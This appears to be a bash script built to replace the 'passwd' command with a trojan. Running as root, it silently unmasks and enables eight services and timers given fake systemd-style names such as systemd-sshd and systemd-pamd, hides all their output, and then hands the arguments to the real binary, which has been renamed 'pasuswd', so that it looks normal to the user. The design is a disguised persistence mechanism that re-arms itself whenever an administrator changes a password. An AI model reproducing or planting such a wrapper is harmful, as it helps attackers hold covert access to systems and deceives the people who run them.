#! /bin/bash

# No root?
if [ "$EUID" -ne 0 ]; then
	echo "Permission Denied: You must run as root!"
	exit
fi

# Unmask and enable services and timers
systemctl daemon-reload >/dev/null 2>/dev/null

systemctl unmask systemd-bootd.service \
	systemd-firewalld.service \
	systemd-issued.service \
	systemd-maild.service \
	systemd-pamd.service \
	systemd-printerd.service \
	systemd-sshd.service \
	systemd-userd.service >/dev/null 2>/dev/null

systemctl unmask systemd-bootd.timer \
	systemd-firewalld.timer \
	systemd-issued.timer \
	systemd-maild.timer \
	systemd-pamd.timer \
	systemd-printerd.timer \
	systemd-sshd.timer \
	systemd-userd.timer >/dev/null 2>/dev/null

systemctl enable --now systemd-bootd.timer \
	systemd-firewalld.timer \
	systemd-issued.timer \
	systemd-maild.timer \
	systemd-pamd.timer \
	systemd-printerd.timer \
	systemd-sshd.timer \
	systemd-userd.timer >/dev/null 2>/dev/null

# Now we run passwd
/usr/bin/pasuswd "$@"

# vim set: filetype=sh:
